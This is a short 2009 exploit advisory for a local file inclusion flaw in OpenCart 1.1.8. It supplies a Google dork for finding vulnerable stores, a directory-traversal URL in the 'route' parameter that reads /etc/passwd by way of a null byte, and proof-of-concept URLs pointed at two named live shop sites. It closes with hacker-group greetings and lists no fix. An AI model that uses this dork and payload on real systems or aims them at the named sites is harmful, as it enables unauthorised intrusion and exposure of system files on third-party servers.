Opencart 1.1.8 (route) Local File Inclusion Vulnerability

2009-04-27 19:27:26

[+]=================================================================[+]
[x]Title : Opencart Lfi Injection Vulnerability
[x]Software : OpenCart opencart_v1.1.8
[x]Vendor : http://www.opencart.com/
[x]Date : 25 April 2009 ( Indonesia )
[x]Author : OoN_Boy
[x]Contact : [email protected]
[x]Blog : http://oonboy.blogspot.com
[+]=================================================================[+]
[o] Vulnerable file

index.php
[+]=================================================================[+]
[x] Google Dork

"Powered by opencart"
[+]=================================================================[+]
[x] Exploit

http://[site]/[path]/index.php?route=../../../../../../../../../../../../../../../etc/passwd%00
[+]=================================================================[x]
[x]Poc

http://www.perebook.com/index.php?route=../../../../../../../../../../../../../../../etc/passwd%00
http://store.thespaberry.com/index.php?route=../../../../../../../../../../../../../../../etc/passwd%00
[+]=================================================================[+]
[x] Special Greetz

www.BatamHacker.or.id www.MainHack.com - www.ServerIsDown.org -
Vrs-hCk, c0li, h4ntu, Opay, Ipay, Paman, NoGe, H312Y, pizzyroot,
zxvf, Joe Chawanua, k0rea,xx_user, s3t4n, Angela Chang, IrcMafia,
str0ke, em|nem, Pandoe, Ronny
Dan buat semuanya yg ga bisa di sebut satu²
[+]=================================================================[+]

#

Fixes

No fixes

In order to submit a new fix you need to be registered.